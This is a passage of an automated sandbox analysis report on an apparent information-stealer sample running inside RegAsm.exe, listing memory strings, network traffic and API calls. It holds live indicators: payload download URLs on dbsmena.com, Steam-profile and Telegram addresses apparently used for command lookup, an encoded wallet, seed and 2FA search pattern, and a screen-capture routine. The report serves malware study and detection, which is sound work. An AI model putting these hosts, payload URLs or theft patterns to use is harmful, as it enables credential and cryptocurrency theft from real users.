                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe)
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe1kkkk1218740https://dbsmena.com/vdshfd.exe1kkkk783966f7e54258
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exe?
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exea;
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exeent-Disposition:
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/ljhgfsd.exefCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0b
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/vdshfd.exe
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dbsmena.com/vdshfd.exetent-Disposition:
                        Source: AAAAKJ.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: AAAAKJ.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: AAAAKJ.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: CFHDBF.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/
                        Source: RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/6
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                        Source: RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869$
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                        Source: RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997804188695
                        Source: file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: EBKKKE.2.drString found in binary or memory: https://support.mozilla.org
                        Source: EBKKKE.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: EBKKKE.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                        Source: file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: AAAAKJ.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: file.exeString found in binary or memory: https://www.entrust.net/rpa0
                        Source: AAAAKJ.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                        Source: RegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                        Source: RegAsm.exe, 00000002.00000002.3298728930.000000001C3EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: EBKKKE.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                        Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49715 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.5:49739 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_00411F55

                        System Summary

                        barindex
                        .NET source code contains very large array initializations
                        Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 393216
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040145B GetCurrentProcess,NtQueryInformationProcess,2_2_0040145B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C0FB700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB8C0 rand_s,NtQueryVirtualMemory,2_2_6C0FB8C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C0FB910
